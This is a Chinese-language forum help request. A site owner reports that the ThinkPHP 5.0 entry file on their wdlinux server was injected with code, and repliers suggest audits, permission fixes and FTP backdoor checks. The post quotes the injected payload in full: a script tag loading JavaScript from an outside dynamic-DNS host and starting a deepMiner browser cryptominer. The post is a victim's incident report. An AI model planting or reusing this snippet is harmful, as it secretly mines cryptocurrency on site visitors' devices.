服务器又被入侵

使用 tp5.0 框架的入口文件被人写入不知道啥玩意的东西

求大佬!!!

阿里云服务器

wdlinux 系统

https://img.mukewang.com/5c8f533c0001bcb608000391.jpg

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
        if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
        }
        </script>";
        
牛魔王的故事
浏览 572回答 11
11回答

Cats萌萌

先找一找是哪里出现的漏洞,注入啊!文件包含啊! 然后看一下文件的权限

慕沐林林

先修改文件属性,比如说把owner变成root:root

缥缈止盈

先把日志搂出来审计一遍

慕斯王

最近留意到几次这样的入侵请问楼主服务器上是否安装了 FTP ?电脑上使用的 FTP 客户端是?我怀疑是 FTP 客户端上的后门

江户川乱折腾

如果这代码是入侵者留下的,可以告诉你,你的每一个用户在帮他挖矿。

温温酱

楼主,我的也中招了!不是用TP的。但是也是使用wdcp这个来搭的。也是直接在我的程序入口处加了你贴出的那段代码。查也查不到头绪。不知道是从哪里黑进来的。

斯蒂芬大帝

你是是什么网站系统呀,用什么服务器呀,最近好多人都被入侵了呢。
打开App,查看更多内容
随时随地看视频慕课网APP